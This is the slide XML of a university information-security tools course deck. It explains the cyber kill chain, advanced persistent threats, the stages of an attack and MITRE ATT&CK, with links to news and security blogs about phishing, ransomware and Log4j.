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257" r:id="rId2"/>
    <p:sldId id="399" r:id="rId3"/>
    <p:sldId id="537" r:id="rId4"/>
    <p:sldId id="549" r:id="rId5"/>
    <p:sldId id="555" r:id="rId6"/>
    <p:sldId id="400" r:id="rId7"/>
    <p:sldId id="556" r:id="rId8"/>
    <p:sldId id="401" r:id="rId9"/>
    <p:sldId id="402" r:id="rId10"/>
    <p:sldId id="403" r:id="rId11"/>
    <p:sldId id="404" r:id="rId12"/>
    <p:sldId id="558" r:id="rId13"/>
    <p:sldId id="405" r:id="rId14"/>
    <p:sldId id="406" r:id="rId15"/>
    <p:sldId id="437" r:id="rId16"/>
    <p:sldId id="438" r:id="rId17"/>
    <p:sldId id="439" r:id="rId18"/>
    <p:sldId id="441" r:id="rId19"/>
    <p:sldId id="548" r:id="rId20"/>
    <p:sldId id="557" r:id="rId21"/>
    <p:sldId id="597" r:id="rId22"/>
    <p:sldId id="553" r:id="rId23"/>
    <p:sldId id="554" r:id="rId24"/>
    <p:sldId id="551" r:id="rId25"/>
    <p:sldId id="501" r:id="rId26"/>
    <p:sldId id="500" r:id="rId27"/>
    <p:sldId id="502" r:id="rId28"/>
    <p:sldId id="264" r:id="rId29"/>
    <p:sldId id="504" r:id="rId30"/>
    <p:sldId id="505" r:id="rId31"/>
    <p:sldId id="506" r:id="rId32"/>
    <p:sldId id="273" r:id="rId33"/>
    <p:sldId id="277" r:id="rId34"/>
    <p:sldId id="278" r:id="rId35"/>
    <p:sldId id="507" r:id="rId36"/>
    <p:sldId id="508" r:id="rId37"/>
    <p:sldId id="279" r:id="rId38"/>
    <p:sldId id="509" r:id="rId39"/>
    <p:sldId id="443" r:id="rId40"/>
    <p:sldId id="444" r:id="rId41"/>
    <p:sldId id="445" r:id="rId42"/>
    <p:sldId id="511" r:id="rId43"/>
    <p:sldId id="446" r:id="rId44"/>
    <p:sldId id="447" r:id="rId45"/>
    <p:sldId id="448" r:id="rId46"/>
    <p:sldId id="449" r:id="rId47"/>
    <p:sldId id="450" r:id="rId48"/>
    <p:sldId id="451" r:id="rId49"/>
    <p:sldId id="512" r:id="rId50"/>
    <p:sldId id="541" r:id="rId51"/>
    <p:sldId id="542" r:id="rId52"/>
    <p:sldId id="543" r:id="rId53"/>
    <p:sldId id="546" r:id="rId54"/>
    <p:sldId id="547" r:id="rId55"/>
    <p:sldId id="544" r:id="rId56"/>
    <p:sldId id="545" r:id="rId57"/>
    <p:sldId id="550" r:id="rId58"/>
    <p:sldId id="559" r:id="rId59"/>
    <p:sldId id="560" r:id="rId60"/>
    <p:sldId id="561" r:id="rId61"/>
    <p:sldId id="562" r:id="rId62"/>
    <p:sldId id="563" r:id="rId63"/>
    <p:sldId id="564" r:id="rId64"/>
    <p:sldId id="565" r:id="rId65"/>
    <p:sldId id="566" r:id="rId66"/>
    <p:sldId id="567" r:id="rId67"/>
    <p:sldId id="568" r:id="rId68"/>
    <p:sldId id="569" r:id="rId69"/>
    <p:sldId id="570" r:id="rId70"/>
    <p:sldId id="571" r:id="rId71"/>
    <p:sldId id="572" r:id="rId72"/>
    <p:sldId id="573" r:id="rId73"/>
    <p:sldId id="574" r:id="rId74"/>
    <p:sldId id="575" r:id="rId75"/>
    <p:sldId id="576" r:id="rId76"/>
    <p:sldId id="577" r:id="rId77"/>
    <p:sldId id="579" r:id="rId78"/>
    <p:sldId id="578" r:id="rId79"/>
    <p:sldId id="530" r:id="rId80"/>
    <p:sldId id="590" r:id="rId81"/>
    <p:sldId id="585" r:id="rId82"/>
    <p:sldId id="586" r:id="rId83"/>
    <p:sldId id="593" r:id="rId84"/>
    <p:sldId id="529" r:id="rId85"/>
    <p:sldId id="524" r:id="rId86"/>
    <p:sldId id="580" r:id="rId87"/>
    <p:sldId id="582" r:id="rId88"/>
    <p:sldId id="583" r:id="rId89"/>
    <p:sldId id="581" r:id="rId90"/>
    <p:sldId id="594" r:id="rId91"/>
    <p:sldId id="595" r:id="rId92"/>
    <p:sldId id="596" r:id="rId93"/>
    <p:sldId id="588" r:id="rId94"/>
    <p:sldId id="589" r:id="rId95"/>
    <p:sldId id="591" r:id="rId96"/>
    <p:sldId id="587" r:id="rId97"/>
    <p:sldId id="584" r:id="rId98"/>
    <p:sldId id="592"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94618"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="104" d="100"/>
          <a:sy n="104" d="100"/>
        </p:scale>
        <p:origin x="1928"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31CAB-B433-9A46-9229-BE4FB22BB453}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/18/22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5B3A4-9A3C-684E-A632-1C62A59A3B77}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>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FECD78-3C8E-49F2-8FAB-59489D168ABB}"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15751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FECD78-3C8E-49F2-8FAB-59489D168ABB}"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1/18/22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1/18/22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BFECD78-3C8E-49F2-8FAB-59489D168ABB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/18/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FB56013-B943-42BA-886F-6F9D4EB85E9D}"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FB56013-B943-42BA-886F-6F9D4EB85E9D}"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6BFECD78-3C8E-49F2-8FAB-59489D168ABB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/18/22</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itre-attack.github.io/attack-navigato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nn.com/2020/03/02/business/barbara-cocoran-email-hack-money-returned/index.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.marketwatch.com/story/shark-tanks-barbara-corcoran-fell-for-this-very-common-phishing-scam-and-it-cost-her-almost-400000-2020-02-27"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witter.com/Skvern0/status/111588548816501965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reddit.com/r/google/comments/692cr4/new_google_docs_phishing_scam_almost_undetectabl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curity.googleblog.com/2017/05/protecting-you-against-phishing.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blog.andrewcantino.com/blog/2014/09/08/example-of-poor-security-communication-in-google-auth-flow/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.redblue.team/2017/02/abusing-google-app-scripting-through.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yaccount.google.com/permission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_Ay2jUxthfw" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://edscoop.com/michigan-state-university-ransomware-attack-shows-need-for-connection-between-it-team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krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.varonis.com/blog/netwalker-ransomwar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ockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html"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victi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witter.com/eastdakota/status/1469800951351427073"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virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/4d44e9ffdaa91e0d63795b9a263a19ad1edd330d800005708cd44710ac09e653" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b"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cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cisagov/log4j-affected-db"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blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wil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ENPM685: Information Security Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spring 2022</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226681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Kill Chain”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step 4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. The actual execution of the exploit, which is, again, relevant only when the attacker uses an exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step 5: Installation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Installing malware on the infected computer is relevant only if the attacker used malware as part of the attack, and even when there is malware involved, the installation is a point in time within a much more elaborate attack process that takes months to operate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1169078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Kill Chain”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step 6: Command and control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. The attacker creates a command and control channel in order to continue to operate his internal assets remotely. This step is relatively generic and relevant throughout the attack, not only when malware is installed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step 7: Action on objectives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. The attacker performs the steps to achieve his actual goals inside the victim’s network. This is the elaborate active attack process that takes months, and thousands of small steps, in order to achieve.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136637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7D971-A007-D04A-974E-1A4B9D8699D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>APT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8203E659-7188-1345-9665-1C248BF73AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> – targeted, coordinated, purposeful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> – their timeline is years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> – people with intent, opportunity, and capability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3165138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apt-cycle.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-45986" r="-45986"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-725224" y="411866"/>
            <a:ext cx="10390359" cy="5714297"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1688039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characteristics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Methods are fluid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The best attackers are pragmatic opportunists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Attackers may jump around between steps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46734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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1538416"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Port scanning and Vulnerability scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>You’re on their network but you don’t have a network map, scanning can help you build your map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(We will discuss scanning from a technical perspective soon)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1413356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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Now that data has been collected, targets identified, it’s time to exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Using tools like ones we will discuss and use in this class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Now that you know your targets, you can expand into very specific tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="972462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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>This is the time you can leverage additional information gained through phishing, social engineering, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Bonus points for physical compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1829927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We’re not done yet!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>We’re not interested in a smash and grab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>We want to settle in for the long haul, collect data ongoing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" strike="sngStrike" dirty="0"/>
              <a:t>Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> Persistent Threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1002691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CDC8-0CBC-F64C-BAB1-3113E351E3B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITRE ATT&amp;CK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF728B11-2197-9D4A-AF2D-9655A522A121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>ATT&amp;CK is a framework of attacker tactics and techniques. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> Used by defenders (threat hunters, and sometimes in coordination with red teams/pen testers) to develop threat models and methodologies and assess an organization’s risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Identify holes in defenses and prioritize what to fix first.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1593626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Anatomy of an Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Or, Why we need all these tools </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1690626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5A25F-F8BB-2F47-B078-4A7E287C02D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://mitre-attack.github.io/attack-navigator/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6C357E6-0787-2449-BC0B-293ADE44CC46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2044273"/>
            <a:ext cx="9144000" cy="3912454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3179436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E7ECF-2D52-EC4C-9A7D-1920022D09E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITRE ATT&amp;CK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5409FF91-4B3C-1649-B888-0C8A64C744DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
